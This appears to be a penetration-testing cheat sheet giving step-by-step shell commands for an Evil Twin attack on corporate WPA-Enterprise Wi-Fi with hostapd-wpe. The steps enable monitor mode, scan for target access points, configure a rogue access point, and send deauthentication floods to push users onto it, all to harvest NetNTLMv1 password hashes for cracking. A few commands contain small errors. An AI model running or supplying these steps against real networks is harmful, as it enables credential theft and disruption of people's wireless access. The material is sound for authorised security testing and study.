# If you need several external eth interfaces, connect then at the beginning# To ensure having wlan0 and wlan1# And avoid having wlan0mon and then wlan0 when you connect the second one# It could result in conflicts
# Evil Twin / Hostapd-wpe is used against MSCHAPv2 access points, usually used by companies# Manually creating a rogue AP for classical WPA/WPA2 requires more configuration
# You might need to patch your hostapd version
https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe
Evil Twin attack
# 1/ Start monitoring mode# If you plan to use deauth attack, connect the 2 eth interfaces at the same time# To avoid having wlan0mon and wlan0 (it can conflict)
sudo airmon-ng start wlan0
# 2/ If process are blocking the monitoring mode, kill them
sudo airmon-ng check kill
sudo kill <PID>
# 3/ Get the target AP (ESSID)# Your target can have multiples AP, and so multiples MAC addresses# They can run on differents channels
sudo airodump wlan0mon
# 4/ Then set the target in the configuration file
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
ssid=<ESSID>
# 5/ Start AP# You will only get people that newly connects to the target AP# If you want to get people already connected, you need to push the attack further with deauth
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# 6/ Start the second ethernet interface
sudo airmon-ng start wlan1
# 7/ Deauth (In another terminal)# Based on the differents ESSID and channels found in step 3# -0 is the number of deauth packet sent
sudo aireplay-ng -0 10 -a <mac address> -c <channel>
# Then wait for credz \o/# You will probably get NetNTLMv1 hashes you will need to crack